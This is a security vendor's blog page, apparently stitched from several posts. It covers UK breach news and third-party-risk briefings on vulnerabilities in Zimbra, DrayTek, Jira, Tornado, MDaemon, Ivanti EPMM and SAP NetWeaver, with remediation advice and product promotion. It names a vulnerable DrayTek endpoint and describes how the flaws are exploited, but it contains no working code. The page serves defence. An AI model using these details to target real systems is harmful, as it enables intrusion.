The UK’s Legal Aid Agency (LAA), overseen by the Ministry of Justice, has fallen victim to a major cyber attack. Many are estimating that this is one of the most significant breaches of sensitive data in the UK’s legal sector to date.
The attack, which came to light in April 2025, has exposed deeply confidential information. It has also disrupted critical services, triggering national concern and prompting urgent investigations.
One of the most influential Cryptocurrency platforms in the world, Coinbase, is the latest victim of a headline-making cyber attack. While there have been other crypto-related hacks in the past, arguably with larger repercussions than those we have seen with Coinbase so far, there’s a lot more at stake here.
UK Retailers are experiencing the full wrath of cyber crime to the greatest degree. It started with Marks and Spencer on the Easter Weekend. Customers were left high and dry without being able to access their “Click and Collect” orders. Online payments became inaccessible and store shelves were fast clearing up.
Easter weekend didn’t go as planned for Marks & Spencer - one of the UK's favourite retailers for clothes, food and more. The industry giant fell victim to a cyber attack that deeply disrupted its operations. Customers were unable to access the Click and Collect service and even contactless payments were inaccessible.
The finance sector is quite susceptible to cyber attacks since the security of digital financial assets makes it so. Cybercriminals with continually changing attack techniques find banks, investment companies, and insurance firms appealing. The necessity for companies to apply strict cybersecurity policies is rising daily, given these mounting hazards.
The surge in remote work didn't just rewrite the rules of collaboration; it unlocked doors that many organisations didn’t even know existed. Conversations that once occurred face-to-face now bounce through cloud platforms, scattered across Slack threads, Zoom calls, and internal wikis.
Workflows became more flexible, but the trust infrastructure behind them didn’t keep up. The illusion of a closed, protected system vanished, and in its place came a vast, decentralized sprawl—one where the lines between internal and external communication blur every day. The increased likelihood of data breaches associated with remote working adds further urgency to address these vulnerabilities
This Week’s Emerging Third-Party Risks in Email Infrastructure and Web Frameworks
Welcome to this week’s edition of Focus Friday, where we provide timely insights into high-profile vulnerabilities from a Third-Party Risk Management (TPRM) lens. In today’s interconnected environment, vulnerabilities affecting one vendor’s technology stack can ripple across entire ecosystems—disrupting operations, compromising sensitive data, and escalating vendor risk exposure.
This week’s FocusTags™ spotlight several notable vulnerabilities with direct implications for organizations relying on third-party software for communication infrastructure and web application delivery. We begin with Zimbra’s CalendarInvite XSS vulnerability, already being exploited by APT28; then examine DrayTek Vigor gateway devices, which are being recruited into botnets due to a critical OS command injection flaw. We also review a newly disclosed privilege escalation vulnerability in Atlassian Jira Data Center, which allows low-privilege users to act with higher-privilege permissions, threatening issue tracking and service management workflows. In addition, we cover a Denial-of-Service vulnerability in Tornado Web Server that threatens application availability, and an actively exploited zero-day XSS vulnerability in MDaemon Email Server, used for credential theft and mailbox compromise.
Each of these incidents highlights the urgency of identifying and remediating vulnerabilities—not just internally, but across your third-party network. This blog helps TPRM professionals do exactly that.
Filtered view of companies with Zimbra – May2025 FocusTag™ on the Black Kite platform.
CVE-2024-27443 is a medium-severity reflected Cross-Site Scripting (XSS) vulnerability affecting Zimbra Collaboration Suite (ZCS) versions 9.0.x (prior to Patch 39) and 10.0.x (prior to 10.0.7). The flaw resides in the Classic Webmail UI’s CalendarInvite feature, where the X-Zimbra-Calendar-Intended-For email header is improperly sanitized. This allows attackers to inject malicious JavaScript into calendar invitations.
When a user opens a crafted calendar invite in the Classic UI, the embedded script executes within their webmail session, potentially enabling attackers to:
Steal authentication cookies
Redirect or manipulate incoming emails
Insert unauthorized calendar events
Send emails or alter contact information as the user.
The vulnerability has a CVSS v3.1 score of 6.1 (Medium) and an EPSS score of 16.22%. It was patched on March 1, 2024, but was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025, indicating active exploitation in the wild. Notably, the Sednit group (also known as APT28) has been linked to exploiting this vulnerability as part of Operation RoundPress, targeting governmental and defense entities in Eastern Europe and beyond.
Why Should TPRM Professionals Be Concerned About CVE-2024-27443?
Zimbra is widely used for enterprise email and calendar services. A compromise of its webmail interface can lead to unauthorized access to sensitive communications and data. The exploitation of CVE-2024-27443 allows attackers to impersonate users, exfiltrate confidential information, and potentially pivot to other systems within the organization.Given the association with APT28, a state-sponsored threat actor, the risk extends to espionage and targeted attacks against critical sectors.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-27443?
Have you upgraded your Zimbra Collaboration to at least 9.0.0 P39 or 10.0.7 to mitigate the risk of CVE-2024-27443?
Have you implemented the recommended hardening measures such as disabling or restricting HTML calendar rendering in the Classic UI and enforcing a Content Security Policy (CSP) to block inline scripts in email/calendar views?
Have you reviewed your webmail access logs for suspicious calendar invite parameters and deployed IDS/IPS signatures to detect XSS payload patterns in calendar headers as recommended?
Can you confirm if you have trained your users to view calendar invitations only from trusted senders and report unexpected invites as part of your mitigation strategy against CVE-2024-27443?
Remediation Recommendations for Vendors Affected by CVE-2024-27443
Apply Vendor Patches: Upgrade Zimbra Collaboration to at least version 9.0.0 Patch 39 or 10.0.7.
Harden Webmail Rendering: Disable or restrict HTML rendering in calendar invitations within the Classic UI until patching is complete.
Enforce Content Security Policies (CSP): Implement CSP to block inline scripts in email and calendar views.
User Training: Educate users to be cautious with calendar invites, especially from unknown senders, and to report suspicious activities.
Monitor and Detect: Review webmail access logs for unusual calendar invite parameters and deploy intrusion detection systems to identify XSS payload patterns.
How Can TPRM Professionals Leverage Black Kite for CVE-2024-27443?
Black Kite has issued the “Zimbra – May2025” FocusTag, providing high-confidence intelligence on vendors potentially exposed to CVE-2024-27443. This tag includes detailed information such as affected assets, IP addresses, and subdomains associated with vulnerable Zimbra deployments. By utilizing this FocusTag, TPRM professionals can:
Quickly identify and prioritize vendors at risk
Access actionable intelligence to assess the extent of exposure
Streamline communication with vendors regarding remediation efforts
Reduce the burden of broad-based questionnaires by focusing on affected parties
Black Kite’s Zimbra – May2025 FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2024-12987 – DrayTek Vigor OS Command Injection Vulnerability
What is CVE-2024-12987 in DrayTek Vigor Devices?
CVE-2024-12987 is a critical OS command injection vulnerability affecting DrayTek Vigor2960, Vigor300B, and Vigor3900 routers running firmware version 1.5.1.4 or earlier. The flaw resides in the Web Management Interface’s /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, where improper sanitization of the session parameter allows remote attackers to inject and execute arbitrary shell commands.
An attacker can exploit this vulnerability by sending a specially crafted HTTP/1.0 request with a hex-encoded payload to the vulnerable endpoint, resulting in command execution with elevated privileges. A public proof-of-concept (PoC) script demonstrates this exploitation method.
The vulnerability has a CVSS v3.1 score of 9.8 (Critical) and an EPSS score of 56.05%. It was added to CISA’s Known Exploited Vulnerabilities catalog on May 16, 2025, indicating active exploitation in the wild. Notably, the Rust-based botnet “RustoBot” leverages this vulnerability to compromise DrayTek gateways, recruiting them into distributed denial-of-service (DDoS) campaigns across regions including Japan, Taiwan, Vietnam, and Mexico.
Why Should TPRM Professionals Be Concerned About CVE-2024-12987?
DrayTek Vigor devices are commonly used as network gateways in enterprise environments. A compromise of these devices can lead to unauthorized access to internal networks, data exfiltration, and service disruptions. The exploitation of CVE-2024-12987 allows attackers to execute arbitrary commands, potentially leading to full device compromise and lateral movement within the network. Given the active exploitation by botnets like RustoBot, the risk extends to participation in large-scale DDoS attacks, amplifying the potential impact on both the compromised organization and external targets.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-12987?
Have you updated all instances of DrayTek Vigor2960, Vigor300B, and Vigor3900 devices to firmware version 1.5.1.5 or later to mitigate the risk of CVE-2024-12987? If your devices were on version 1.0.5 or earlier, did you first upgrade to 1.0.7.1 before applying 1.5.1.5?
Have you implemented a Web Application Firewall (WAF) or Access Control Lists (ACLs) to filter unexpected parameters and disable unused CGI endpoints, specifically the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, to prevent the OS command injection vulnerability?
Have you deployed IDS/IPS signatures for CVE-2024-12987 and are you actively monitoring for inbound requests to /cgi-bin/mainfunction.cgi/apmcfgupload and anomalous User-Agent strings or unexpected HTTP/1.0 traffic patterns as part of your incident response strategy?
Given that the RustoBot botnet is actively exploiting this vulnerability, have you reviewed your logs for signs of exploitation and prepared for rapid rollback or device restoration in case of a suspected compromise?
Remediation Recommendations for Vendors Affected by CVE-2024-12987
Upgrade Firmware: Immediately update affected DrayTek devices to firmware version 1.5.1.5. For devices on version 1.0.5 or earlier, first upgrade to 1.0.7.1 before applying the latest firmware.
Restrict Management Access: Limit access to the Web Management Interface to trusted administrative networks; block direct internet exposure.
Network Segmentation: Isolate device management VLANs and implement firewall rules to prevent lateral movement.
Monitor & Detect: Scan for inbound requests to /cgi-bin/mainfunction.cgi/apmcfgupload and anomalous User-Agent strings or unexpected HTTP/1.0 traffic patterns.
Harden Configuration: Employ a Web Application Firewall (WAF) or Access Control Lists (ACLs) to filter unexpected parameters and disable unused CGI endpoints.
Incident Response: Review logs for signs of exploitation, deploy intrusion detection/prevention systems (IDS/IPS) signatures for CVE-2024-12987, and plan for rapid rollback or device restoration if compromise is suspected.
How Can TPRM Professionals Leverage Black Kite for CVE-2024-12987?
Black Kite has issued the “DrayTek Vigor – May2025” FocusTag, providing high-confidence intelligence on vendors potentially exposed to CVE-2024-12987. This tag includes detailed information such as affected assets, IP addresses, and subdomains associated with vulnerable DrayTek deployments. By utilizing this FocusTag, TPRM professionals can:
Black Kite’s DrayTek Vigor – May2025 FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-22157 – Atlassian Jira Data Center Privilege Escalation
What is the Jira Data Center Privilege Escalation Vulnerability (CVE-2025-22157)?
CVE-2025-22157 is a high-severity privilege escalation vulnerability affecting Atlassian Jira Core and Jira Service Management Data Center and Server editions. This flaw allows authenticated users with low-level permissions to perform actions under higher-privileged accounts by exploiting improper permission checks in Jira’s REST API and backend handlers. The vulnerability was introduced in versions 9.12.0, 10.3.0, 10.4.0, and 10.5.0 of Jira Core, and versions 5.12.0, 10.3.0, 10.4.0, and 10.5.0 of Jira Service Management.
With a CVSS score of 7.2 and an EPSS score of 0.05%, this vulnerability poses a significant risk, allowing attackers to compromise administrative functions, alter project configurations, and disrupt service-desk operations. As of now, there is no public PoC exploit code, and the vulnerability has not been added to CISA’s Known Exploited Vulnerabilities catalog.
Why Should TPRM Professionals Be Concerned About CVE-2025-22157?
Jira Data Center is widely used for project management, issue tracking, and service management across various industries. A privilege escalation vulnerability in such a critical system can lead to unauthorized access to sensitive data, disruption of workflows, and potential compliance violations. Third-party vendors using vulnerable versions of Jira may inadvertently expose your organization to these risks.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-22157?
Can you confirm if you have upgraded all instances of Jira Core Data Center & Server and Jira Service Management Data Center & Server to the recommended versions (9.12-series → ≥ 9.12.20; 10.3-series → ≥ 10.3.5; 10.4-series → ≥ 10.6.0; 10.5-series → ≥ 10.5.1) to mitigate the risk of CVE-2025-22157?
Have you implemented stricter privilege boundaries and temporary restrictions on low-privilege accounts until patches are applied as recommended in the advisory for CVE-2025-22157?
Have you enabled logging and alerts for privilege-sensitive API endpoints and administrative actions to monitor potential exploitation of the privilege escalation vulnerability (CVE-2025-22157) in Jira Core and Service Management?
Have you conducted an audit of existing project-level and read-only roles for unusual API activity as part of your response to the CVE-2025-22157 vulnerability?
Remediation Recommendations for Vendors Affected by CVE-2025-22157
Upgrade Jira Immediately: Apply the latest patches provided by Atlassian to address CVE-2025-22157.
Review Permissions: Conduct a thorough audit of user roles and permissions to ensure proper access controls are in place.
Harden Access Controls: Implement stricter privilege boundaries and consider temporary restrictions on low-privilege accounts until patches are applied.
Monitor & Alert: Enable logging and alerts for privilege-sensitive API endpoints and administrative actions to detect any suspicious activities.
How Can TPRM Professionals Leverage Black Kite for CVE-2025-22157?
Black Kite published the FocusTag for CVE-2025-22157 on May 22, 2025. This tag enables TPRM professionals to identify third-party vendors that may be affected by this vulnerability. By providing asset information such as IP addresses and subdomains, Black Kite allows for a more precise assessment of potential risks within your supply chain. Utilizing this information, you can prioritize remediation efforts, engage in informed discussions with vendors, and enhance your organization’s overall cybersecurity posture.
Black Kite’s Atlassian Jira Data Center FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2025-47287 – Tornado Web Server DoS Vulnerability
What is the Tornado multipart/form-data Denial-of-Service vulnerability (CVE-2025-47287)?
CVE-2025-47287 is a high-severity Denial-of-Service (DoS) vulnerability affecting Tornado, a Python-based asynchronous web framework and networking library. The vulnerability arises from the way Tornado’s built-in multipart/form-data parser handles malformed inputs. In affected versions (all releases prior to 6.5.0), if the parser encounters certain structural issues in multipart requests, it logs a warning message but continues attempting to parse the rest of the request.
Because Tornado’s logging system operates synchronously by default, an attacker can remotely send a malformed multipart request to any vulnerable endpoint. This causes the application to generate a large volume of log entries, rapidly consuming disk space, CPU, and I/O resources. The attack does not require authentication or complex exploitation, and the affected parser is enabled by default.
This vulnerability carries a CVSS score of 7.5 (High) and an EPSS score of 0.10%. It was publicly disclosed on May 15, 2025, through GitHub’s security advisory system. There is no evidence of exploitation in the wild, and the issue has not been added to CISA’s Known Exploited Vulnerabilities catalog. Likewise, CISA has not issued an advisory regarding this vulnerability at this time.
Why Should TPRM Professionals Be Concerned About CVE-2025-47287?
While the vulnerability does not provide direct access to sensitive data or remote code execution capabilities, it poses a significant threat to service availability, which can have downstream effects on any integrated or dependent systems. Organizations using Tornado in public-facing APIs or web applications may experience partial or complete outages if targeted with malformed multipart/form-data payloads.
From a third-party risk management (TPRM) perspective, vendors who use Tornado in production environments without proper traffic filtering or resource limits may unknowingly expose critical services to denial-of-service scenarios. If such services are part of an enterprise’s supply chain—such as SaaS products or integration providers—disruptions may cascade into the organization’s own operations, undermining continuity and performance expectations.
Remediation Recommendations for Vendors Affected by CVE-2025-47287
Vendors who maintain Tornado-based systems should take the following technical steps to mitigate risk:
Upgrade Framework: Update Tornado to version 6.5.0 or later, where the issue has been resolved.
Proxy Mitigation: As a temporary measure, configure reverse proxies or Web Application Firewalls (WAFs) to block or rate-limit requests with Content-Type: multipart/form-data.
Input Validation: Implement strict server-side validation of multipart payload structures before they are processed by Tornado’s parser.
Resource Limiting: Enforce OS- or container-level resource quotas (e.g., for CPU, memory, and disk I/O) to prevent single services from exhausting shared system resources.
Monitoring and Alerting: Set up logging and metric-based alerting to detect rapid increases in log volume or application latency.
How Can TPRM Professionals Leverage Black Kite for CVE-2025-47287?
Black Kite published the Tornado Web Server FocusTag on May 20, 2025, in response to the disclosure of CVE-2025-47287. This tag enables TPRM professionals to identify vendors potentially running vulnerable versions of Tornado, especially those with public-facing services that may accept multipart/form-data inputs.
The FocusTag offers very high confidence in product identification and includes granular intelligence such as subdomain and IP address visibility, helping organizations zero in on real exposure rather than issuing broad-based surveys. Operationalizing this tag allows risk teams to prioritize follow-ups with only the vendors that are relevant to this incident, saving time and reducing unnecessary noise in communication workflows.
The tag is set to expire on August 31, 2025, unless new developments warrant an update. Black Kite’s ability to tie internet-facing telemetry to software versioning ensures that customers receive actionable third-party insights rather than generic alerts.
Black Kite’s Tornado Web Server FocusTagTM details critical insights on the event for TPRM professionals.
CVE-2024-11182 – MDaemon Email Server XSS Vulnerability
What is the MDaemon Webmail XSS Vulnerability (CVE-2024-11182)?
CVE-2024-11182 is a medium-severity cross-site scripting (XSS) vulnerability affecting MDaemon Email Server versions prior to 24.5.1. The flaw resides in the webmail interface’s HTML email rendering component, where improper sanitization allows attackers to inject malicious JavaScript code via specially crafted emails. This vulnerability enables remote attackers to execute arbitrary scripts in the context of the user’s browser session, potentially leading to credential theft and unauthorized access to sensitive information.
The vulnerability has a CVSS score of 6.1 and an EPSS score of 37.33%. It was actively exploited as a zero-day by the Russia-linked threat actor APT28 (also known as Fancy Bear or Sednit) in a campaign dubbed “Operation RoundPress,” targeting government and defense sector webmail servers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-11182 to its Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025, highlighting its active exploitation in the wild.
Why Should TPRM Professionals Be Concerned About CVE-2024-11182?
MDaemon Email Server is widely used by organizations for email communication. Exploitation of CVE-2024-11182 can lead to unauthorized access to email accounts, exposure of sensitive communications, and potential lateral movement within an organization’s network. For third-party risk management (TPRM) professionals, this vulnerability poses significant concerns:
Data Exfiltration: Attackers can harvest credentials, contact lists, and email contents, leading to potential data breaches.
Persistent Access: The use of malicious Sieve rules allows attackers to maintain access even after initial compromise.
Supply Chain Risks: Vendors using vulnerable MDaemon versions may become entry points for attackers into larger networks.
What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-11182?
To assess the risk associated with this vulnerability, TPRM professionals should inquire:
Have you updated all instances of MDaemon Webmail to version 24.5.1 or later to mitigate the risk of CVE-2024-11182?
Can you confirm if you have implemented a strict Content Security Policy to block inline scripts and disabled automatic HTML email rendering as recommended in the advisory?
Have you audited Sieve rules to identify and remove any unauthorized mail-forwarding rules in users’ mailboxes that could be a result of the SpyPress stealer?
Are you monitoring for indicators such as unusual HTTP POSTs to compromised webmail servers, creation of atypical Sieve rules, and outbound traffic to known SpyPress C2 endpoints to detect any potential exploitation of CVE-2024-11182?
Remediation Recommendations for Vendors Affected by CVE-2024-11182
Vendors utilizing MDaemon Email Server should take the following actions:
Immediate Patching: Upgrade to MDaemon version 24.5.1 or later to address the vulnerability.
Disable HTML Rendering: Configure webmail clients to disable automatic HTML email rendering or enforce strict Content Security Policies (CSP) to mitigate XSS risks.
Audit and Monitor: Regularly review mail forwarding rules and monitor for unusual activities, such as unexpected HTTP POST requests to known malicious domains.
User Training: Educate users about the risks of opening emails from unknown sources and encourage reporting of suspicious activities.
How Can TPRM Professionals Leverage Black Kite for CVE-2024-11182?
Black Kite provides visibility into third-party vulnerabilities, including CVE-2024-11182. By utilizing Black Kite’s platform, TPRM professionals can:
Identify Exposure: Determine which vendors are running vulnerable versions of MDaemon Email Server.
Assess Risk: Evaluate the potential impact of the vulnerability on the organization’s supply chain.
Monitor Remediation: Track vendors’ progress in addressing the vulnerability and ensure timely patching.
Black Kite’s MDaemon Email Server FocusTagTM details critical insights on the event for TPRM professionals.
Strengthening TPRM with Black Kite’s FocusTags™
When high-impact vulnerabilities like those found in Zimbra, DrayTek Vigor, Atlassian Jira Data Center, Tornado, and MDaemon emerge, time is of the essence. Black Kite’s FocusTags™ offer organizations a strategic advantage by transforming complex threat data into actionable intelligence—enabling faster, more focused responses to third-party exposure.
Here’s how FocusTags™ enhance your TPRM program:
Vendor-Specific Vulnerability Detection: Black Kite pinpoints which of your vendors are at risk based on real-world data, including IPs and subdomains associated with vulnerable assets.
Prioritized Risk Management: FocusTags™ help organizations allocate resources where it matters most—toward vendors affected by the most critical or actively exploited vulnerabilities.
Informed Vendor Dialogue: Instead of generic outreach, you can ask precise, vulnerability-specific questions to assess a vendor’s mitigation strategy and security posture.
Streamlined Incident Response: With enriched threat context and timely updates, FocusTags™ empower your TPRM team to act decisively when new vulnerabilities arise.
By operationalizing Black Kite’s FocusTags™, TPRM professionals can cut through the noise and quickly narrow their focus to the vendors that truly require attention—enhancing resilience in an ever-evolving threat landscape.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
DrayTek Vigor – May2025 : CVE-2024-12987, OS Command Injection Vulnerability in DrayTek Vigor Routers.
Atlassian Jira Data Center : CVE-2025-22157, Privilege Escalation Vulnerability in Jira Core Data Center, Jira Core Server, Jira Service Management Data Center, Jira Service Management Server.
Tornado Web Server : CVE-2025-47287, DoS Vulnerability in Tornado Web Server.
MDaemon Email Server : CVE-2024-11182, Cross-Site Scripting (XSS) Vulnerability in MDaemon Email Server.
Ivanti EPMM – May2025 : CVE-2025-4427, CVE-2025-4428, Authentication Bypass and Remote Code Execution Vulnerability in Ivanti Endpoint Manager Mobile (EPMM)
SysAid On-Premises : CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, XML External Entity (XXE) Injection Vulnerability in SysAid On-Premises.
Apache ActiveMQ – May2025 : CVE-2025-27533, Memory Allocation with Excessive Size Value in Apache ActiveMQ.
Webmin: CVE-2025-2774, CRLF Injection Privilege Escalation Vulnerability in Webmin.
Couchbase Server: CVE-2025-46619, LFI Vulnerability in Couchbase Server.
SAP NetWeaver VCFRAMEWORK : CVE-2025-31324, Remote Code Execution Vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader component.
Apache Tomcat – Apr2025 : CVE-2025-31650, CVE-2025-31651, DoS Vulnerability, Rewrite Rule Bypass Vulnerability in Apache Tomcat.
With over 40,000 vulnerabilities disclosed last year—a 38% jump from the year prior—the real challenge for third-party risk management (TPRM) professionals isn’t knowing which risks exist. It’s knowing which ones to act on and how—a task made particularly difficult when managing risk across hundreds of vendors.
In Part 1 of our series, I introduced a three-dimensional approach to cybersecurity vulnerability management in TPRM—detailed in our 2025 Supply Chain Vulnerability Report—to help teams prioritize vulnerabilities in the supply chain based on severity, exploitability, and exposure. This dramatically narrows the field from tens of thousands of Common Vulnerabilities & Exposures (CVEs) to a much more manageable number.
But identifying risk is only half of the process. Acting on it is the other half.
In this second video, I walk through how TPRM teams can operationalize vulnerability intelligence, moving beyond theoretical prioritization to real-world application. Using tools like Black Kite’s FocusTags™, teams can gain clear visibility into which vulnerabilities are most urgent, which vendors might be exposed, and what steps to take for remediation.
A vulnerability’s CVSS score can clue you into potential severity, while its EPSS score can help predict the likelihood of exploitation. But neither tells the full story. Some vulnerabilities look dangerous on paper but are rarely exploited, while others fly under the radar until they become the entry point for a major breach.
Black Kite’s FocusTags help security teams tell the difference, surfacing the CVEs that are highly likely to be exploited, regardless of their severity level. It does this by layering in real-world signals that indicate whether bad actors are likely to attack.
How to Filter CVEs by Real-World Exploitability:
CISA KEV inclusion: Has the vulnerability already been exploited in the wild?
Public exploit availability: Are proof-of-concept (PoC) exploits readily available?
Threat actor interest: Has it been mentioned in underground forums or used in attack campaigns?
Community discussions: Is there a surge in security researchers analyzing it?
Zero-day status: Is it newly disclosed with limited patches available?
Supply chain impact: Does it affect widely used products with third-party exposure?
Analyzing these risk factors, FocusTags help TPRM teams detect not just the most severe vulnerabilities, but also the ones most likely to be weaponized. Instead of reacting to every “critical” CVE, teams can focus on the ones that pose the greatest risk to their supply chain.
Risk Hunting, Not Just Monitoring
Most TPRM programs still depend on slow, reactive processes—waiting for vendor disclosures, following up on questionnaires, and hoping for timely responses. But the gap between disclosure and exploitation is shrinking fast: In 2021, attackers took 42 days on average to exploit a new CVE. By 2023, that window dropped to just 5 days.
When exploitation moves that quickly, speed matters.
FocusTags enable a more proactive approach, helping security teams shift from passive monitoring to active risk hunting. Through Black Kite’s Risk Intelligence page, teams can identify which vendors are likely exposed, track changes in exposure over time, and access vendor-specific guidance to drive faster remediation.
To make action even more precise, we recently introduced Vulnerability Intelligence Briefs (VIBs) which offer detailed views of each CVE and where they are found in our customers’ supply chains. Think of them like baseball cards, but for vulnerabilities: each one gives you the essential stats you need to understand the risk and act fast.
If a CVE affects a vendor in your ecosystem, the brief tells you who’s likely running it and what questions to ask to confirm and resolve it. With these insights, you can act early, armed with the data needed to initiate informed, targeted vendor outreach.
The Future of TPRM Is Intelligence in Action
Third-party risk management isn’t about chasing every vulnerability—it’s about knowing which ones warrant your attention and moving quickly. And that requires more than static scores or vendor questionnaires.
As exploitation timelines shrink and supply chains become more complex, security teams need context on which they can act. Tools like FocusTags help meet that need, highlighting the vulnerabilities that require immediate attention due to exposure, exploitability, and third-party risk.
This kind of actionable vulnerability assessment is what defines the future of TPRM. By understanding attacker behavior, identifying vendor exposure, and prioritizing action based on real-world signals, security teams can move beyond reactive patching and toward a more strategic defense of their third-party ecosystem.
Read our full 2025 Supply Chain Vulnerability Report: Navigating a New Era of Managing Vulnerability Risk in Third Parties – accessible instantly, no download required.
Welcome to this week’s Focus Friday, where we delve into high-profile incidents from a Third-Party Risk Management (TPRM) perspective. This week, we’re focusing on vulnerabilities discovered in Ivanti’s Endpoint Manager Mobile (EPMM). Specifically, we’ll address two critical flaws, CVE-2025-4427 (Authentication Bypass) and CVE-2025-4428 (Remote Code Execution), which, when exploited together, allow unauthenticated attackers to bypass authentication and execute arbitrary code remotely on affected systems. These vulnerabilities, if left unchecked, could pose a serious threat to organizations using Ivanti EPMM for mobile device management. Read on to explore the details and how Black Kite’s FocusTags™ can assist in managing the associated risks.
Filtered view of companies with Ivanti EPMM – May2025 FocusTag™ on the Black Kite platform.
What is the Ivanti EPMM RCE and Authentication Bypass Vulnerability? (CVE-2025-4427, CVE-2025-4428)
Ivanti Endpoint Manager Mobile (EPMM) has two vulnerabilities, CVE-2025-4427 and CVE-2025-4428, that are critical for organizations using this software for mobile device management. These vulnerabilities, when chained together, allow unauthenticated attackers to bypass authentication and execute arbitrary code remotely on the affected systems.
CVE-2025-4427: This is an authentication bypass vulnerability that allows attackers to access protected resources without valid credentials. It has a medium severity level with a CVSS score of 5.3 and an EPSS score of 0.94%.
CVE-2025-4428: This vulnerability is a remote code execution (RCE) flaw that enables attackers to execute arbitrary code on the target system. This vulnerability has a high severity level with a CVSS score of 7.2 and an EPSS score of 0.51%.
Both vulnerabilities were discovered and publicly disclosed in May 2025, and there are reports of active exploitation in the wild. However, no PoC exploit code has been publicly released. The vulnerabilities were not added to CISA’s KEV catalog as of the time of disclosure.
Why Should TPRM Professionals Care About These Vulnerabilities?
For third-party risk management (TPRM) professionals, these vulnerabilities pose a severe risk because they impact the integrity and availability of the mobile device management (MDM) infrastructure. Organizations using Ivanti EPMM for mobile device management may be exposed to potential breaches, unauthorized access, and even complete control over their devices and networks.
If attackers successfully exploit these vulnerabilities, they could gain access to sensitive data and internal configurations, leading to further lateral movement in the network. This makes it essential for TPRM professionals to assess the risk posed by vendors using Ivanti EPMM, especially those running vulnerable versions.
What Questions Should TPRM Professionals Ask Vendors About Ivanti EPMM Vulnerabilities?
Have you applied the latest security patches to Ivanti EPMM (versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1)?
What access control measures do you have in place to secure the Ivanti EPMM API, such as using a Web Application Firewall (WAF) or Portal ACLs?
Can you confirm whether any unusual API requests or failed authentication attempts have been detected in your logs?
If your organization is unable to immediately upgrade Ivanti EPMM, what mitigation strategies are in place to reduce the impact of these vulnerabilities?
Remediation Recommendations for Vendors Subject to This Risk
Upgrade Ivanti EPMM to a fixed version: Apply the patches available in versions 11.12.0.5, 12.3.0.2, 12.4.0.2, or 12.5.0.1 to address both CVE-2025-4427 and CVE-2025-4428.
Implement strong access control: Use Portal ACLs or an external WAF to restrict API access and ensure that only authorized services and IP addresses can interact with the EPMM API.
Review and strengthen integrations: Ensure that critical integrations such as Windows Autopilot and Microsoft Graph API are properly configured to prevent disruptions.
Monitor for signs of exploitation: Regularly review logs for failed authentication attempts and abnormal API requests, and follow up with Ivanti support if exploitation is suspected.
How TPRM Professionals Can Leverage Black Kite for This Vulnerability
Black Kite’s FocusTag for Ivanti EPMM highlights the affected versions and helps TPRM professionals quickly identify vendors exposed to these critical vulnerabilities. By using Black Kite’s platform, TPRM teams can determine which vendors are affected, identify any potentially vulnerable assets (like IP addresses and subdomains), and prioritize outreach to those vendors for remediation.
The FocusTag also provides actionable intelligence, such as the specific versions at risk and recommendations for mitigations. This enables organizations to proactively manage their risk exposure and make data-driven decisions.
Since this is a new FocusTag, it provides an updated and detailed analysis of the risk posed by Ivanti EPMM vulnerabilities. Black Kite customers can operationalize this tag by integrating the identified vulnerabilities into their risk management workflows, ensuring a more targeted and efficient vendor outreach process.
Black Kite’s Ivanti EPMM – May2025 FocusTagTM details critical insights on the event for TPRM professionals.
Update on SAP NetWeaver Vulnerabilities: Threat Actor Activity Continues
In April 2025, Black Kite’s FocusTag for SAP NetWeaver included a series of vulnerabilities that continue to pose a significant threat to organizations relying on this enterprise platform. As of May 2025, the situation has escalated, with multiple ransomware groups now actively exploiting these vulnerabilities.
The CVE-2025-42999, an insecure deserialization vulnerability in SAP NetWeaver Visual Composer’s Metadata Uploader, has been added to the existing SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag. This vulnerability allows privileged users to upload untrusted serialized content, which, when deserialized, can severely compromise the system’s confidentiality, integrity, and availability.
The vulnerability has been actively exploited by several threat actor groups, including notorious ransomware gangs. As detailed in SAP’s May 2025 Security Patch Day alert, the RansomEXX and BianLian ransomware groups are targeting SAP NetWeaver systems with this flaw. While no ransomware payloads have been successfully deployed, the ongoing exploitation is a stark reminder of the continuing risk posed by this vulnerability. Additionally, several Chinese APT groups are also targeting unpatched NetWeaver instances, with evidence suggesting strategic objectives tied to espionage.
What Does This Mean for TPRM Professionals?
The addition of CVE-2025-42999 to the SAP NetWeaver FocusTag further emphasizes the critical nature of this vulnerability. TPRM professionals must now be even more vigilant in identifying vendors and third parties that rely on SAP NetWeaver systems. With active exploitation reported in the wild, including by sophisticated ransomware actors, the risk to organizations’ operational continuity is heightened.
If you’re managing third-party risks related to SAP NetWeaver, it is crucial to ensure that vendors have applied the latest patches and are actively monitoring for suspicious activity, especially around Visual Composer and its related components. Prompt remediation and proactive monitoring will be key to preventing a potential breach.
For those following the SAP NetWeaver VCFRAMEWORK [Suspected] FocusTag, stay informed on new CVEs and exploit activity to adjust your risk mitigation strategies accordingly.
Enhancing TPRM Strategies with Black Kite’s FocusTags™
In today’s rapidly evolving cybersecurity landscape, staying ahead of vulnerabilities is crucial for robust Third-Party Risk Management (TPRM). Black Kite’s FocusTags™ provide essential insights and tools to effectively manage these risks, especially in the face of emerging threats like those found in Ivanti EPMM and SAP NetWeaver.
Here’s how Black Kite’s FocusTags™ can enhance your TPRM strategy:
Real-Time Vulnerability Tracking: FocusTags™ allow TPRM professionals to quickly identify vendors affected by the latest vulnerabilities, enabling faster, more strategic responses.
Risk Prioritization: FocusTags™ help prioritize risks based on the severity of vulnerabilities and the importance of affected vendors, ensuring resources are allocated where they’re needed most.
